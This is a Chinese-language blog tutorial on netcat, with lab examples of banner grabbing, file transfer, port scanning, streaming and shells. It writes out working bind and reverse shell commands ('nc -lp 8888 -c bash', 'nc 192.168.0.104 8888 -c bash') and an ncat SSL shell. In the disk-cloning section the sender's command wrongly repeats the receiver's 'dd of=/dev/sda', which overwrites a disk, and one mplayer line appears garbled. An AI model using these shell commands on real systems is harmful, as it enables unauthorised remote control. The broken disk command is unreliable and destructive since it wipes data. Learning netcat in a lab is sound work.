NETCAT(nc)用法

NETCAT ——NC

nc是kali下常用的一个命令行工具,在网络工具中有“瑞士军刀”美誉,当然除了linux版本之外,还有windows版本,是一个跨平台的实用工具,最开始接触nc是ctf比赛中连接题目服务器进行解题,后面才知道nc的功能远不止这些,所以写下这篇文章记录一下。
点击这里看看百度百科是怎么介绍NETCAT的

nc的常用功能

nc常用参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@kali:~# nc -h
[v1.10-41]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

具体如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
参数	作用
-i 设置数据报传送时间间隔
-l 以服务器方式运行
-k 重复接收并处理某个端口上的所有连接,必须与-l选项一起使用
-n 使用ip地址表示主机,而不是主机名;使用数字表示端口,而不是服务名称
-p 当nc命令以客户端运行时,强制其使用端口号
-s 设置本地主机发出的数据报的ip地址
-C 将CR和LF俩个字符作为行结束符
-U 使用UNIX本地域协议
-u 使用UDP协议,默认是TCP协议
-w 如果nc客户端在指定的事件内未检测到任何输入,则退出
-X 当nc客户端和代理服务器通信时,该选项指定他们之间的通信协议
-x 指定目标代理服务器的IP地址和端口号
-z 扫描目标机器上的某个或某些服务是否开启

telnet / 获取banner信息

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# ping pop.qq.com
PING pop.qq.com (59.37.97.57) 56(84) bytes of data.
64 bytes from 59.37.97.57: icmp_seq=1 ttl=53 time=23.1 ms
64 bytes from 59.37.97.57: icmp_seq=2 ttl=53 time=23.3 ms
^Z
[8]+ Stopped ping pop.qq.com
root@kali:~# nc -nv 59.37.97.57 995
(UNKNOWN) [59.37.97.57] 995 (pop3s) open
^Z
[9]+ Stopped nc -nv 59.37.97.57 995
root@kali:~#

这里我们使用nc去连接qq邮箱的pop服务,可以看到连接成功了。

传输⽂本信息

服务器端(192.168.0.104)

1
2
3
4
5
6
7
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.104 netmask 255.255.255.0 broadcast 192.168.0.255

root@kali:~# nc -l -p 8888
我是105
我是104

客户端(192.168.0.105)

1
2
3
4
5
6
7
8
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.105 netmask 255.255.255.0 broadcast

root@kali:~# nc -nv 192.168.0.104 8888
(UNKNOWN) [192.168.0.104] 8888 (?) open
我是105
我是104

传输⽂件/目录

传输文件

服务器端(192.168.0.104)

1
2
3
4
5
6
7
root@kali:~/Desktop# ls
test.txt
root@kali:~/Desktop# nc -l -p 8888 >testfrom105.txt
root@kali:~/Desktop# ls
testfrom105.txt test.txt
root@kali:~/Desktop# cat testfrom105.txt
i come from 105

客户端(192.168.0.105)

1
2
3
4
root@kali:~# ls
Desktop Documents Downloads Music Pictures Public Templates test.txt Videos
root@kali:~# nc -nv 192.168.0.104 8888 < test.txt -q 1
(UNKNOWN) [192.168.0.104] 8888 (?) open

传输目录

服务器端(192.168.0.105)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:~# mkdir testin105
root@kali:~# cd testin105/
root@kali:~/testin105# touch test1.txt
root@kali:~/testin105# vi test1.txt
root@kali:~/testin105# cat test1.txt
come fron 105
root@kali:~/testin105# cd ..
root@kali:~# ls
Desktop Downloads Pictures Templates test.txt
Documents Music Public testin105 Videos
root@kali:~# tar -cvf - testin105/ | nc -lp 8888 -q 1
testin105/
testin105/test1.txt
root@kali:~#

客户端(192.168.0.104)

1
2
3
4
5
6
7
8
9
10
11
root@kali:~/Desktop# ls
testfrom105.txt test.txt
root@kali:~/Desktop# nc -nv 192.168.0.105 8888 | tar -xvf -
(UNKNOWN) [192.168.0.105] 8888 (?) open
testin105/
testin105/test1.txt
root@kali:~/Desktop# ls
testfrom105.txt testin105 test.txt
root@kali:~/Desktop# cd testin105/
root@kali:~/Desktop/testin105# cat test1.txt
come fron 105

加密传输⽂件

发送方

1
mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 192.168.0.104 8888 -q 1

接收方

1
nc -lp 8888 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~/Desktop# nc -nvz 192.168.0.105 1-65535
(UNKNOWN) [192.168.0.105] 8888 (?) open
(UNKNOWN) [192.168.0.105] 22 (ssh) open

root@kali:~/Desktop# nc -vnvz 192.168.0.105 20-25
(UNKNOWN) [192.168.0.105] 25 (smtp) : Connection refused
(UNKNOWN) [192.168.0.105] 24 (?) : Connection refused
(UNKNOWN) [192.168.0.105] 23 (telnet) : Connection refused
(UNKNOWN) [192.168.0.105] 22 (ssh) open
(UNKNOWN) [192.168.0.105] 21 (ftp) : Connection refused
(UNKNOWN) [192.168.0.105] 20 (ftp-data) : Connection refused
sent 0, rcvd 0
root@kali:~/Desktop#

这里使用192.168.0.104的虚拟机扫描192.168.0.105这个ip开放的端口。

远程控制/⽊⻢

正向(服务器提供shell)

服务器端(192.168.0.104)

1
root@kali:~/Desktop# nc -lp 8888 -c bash

客户端(192.168.0.105)

1
2
3
4
5
6
7
8
9
10
root@kali:~# nc 192.168.0.104 8888
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.104 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::a00:27ff:fee2:3544 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:e2:35:44 txqueuelen 1000 (Ethernet)
RX packets 179887 bytes 12207744 (11.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 216384 bytes 22147179 (21.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

反向(向服务器提供shell)

服务器端(192.168.0.104)

1
2
3
4
5
6
7
8
9
10
root@kali:~/Desktop# nc -lp 8888
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.105 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::a00:27ff:fe7e:89b8 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:7e:89:b8 txqueuelen 1000 (Ethernet)
RX packets 182183 bytes 13976858 (13.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 220592 bytes 20972545 (20.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

客户端(192.168.0.105)

1
root@kali:~# nc 192.168.0.104 8888 -c bash

流媒体服务器

服务器

1
cat 1.mp4 | nc -lp 8888

客户端

1
nc -nv 192.168.0.104 8888 | mplayer -vo x11 cache 3000 -

远程克隆硬盘

接收方

1
root@kali:~/Desktop# nc -lp 8888 | dd of=/dev/sda

发送方

1
root@kali:~/Desktop# nc -lp 8888 | dd of=/dev/sda

nc的不足及解决方法

不足

nc不包含身份验证和加密能力,所以在公网上使用会很不安全。

解决方法

使用nmap工具包中的NCAT工具
服务器端

1
2
3
4
5
6
7
8
root@kali:~/Desktop# ncat -c bash --allow 192.168.0.105 -nvl 8888 --ssl
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 4C17 4716 20A5 422C 6065 6B7D 4232 9A3C 59D8 38E1
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 192.168.0.105.
Ncat: Connection from 192.168.0.105:49614.

客户端

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@kali:~# ncat -nv 192.168.0.104 8888 --ssl
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Subject: CN=localhost
Ncat: Issuer: CN=localhost
Ncat: SHA-1 fingerprint: 4C17 4716 20A5 422C 6065 6B7D 4232 9A3C 59D8 38E1
Ncat: Certificate verification failed (self signed certificate).
Ncat: SSL connection to 192.168.0.104:8888.
Ncat: SHA-1 fingerprint: 4C17 4716 20A5 422C 6065 6B7D 4232 9A3C 59D8 38E1
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.104 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::a00:27ff:fee2:3544 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:e2:35:44 txqueuelen 1000 (Ethernet)
RX packets 211628 bytes 14499858 (13.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 267090 bytes 28840239 (27.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 0 (Local Loopback)
RX packets 28 bytes 1756 (1.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28 bytes 1756 (1.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

------ 本文结束感谢您的阅读 ------
坚持记录生活,您的支持将鼓励我继续创作!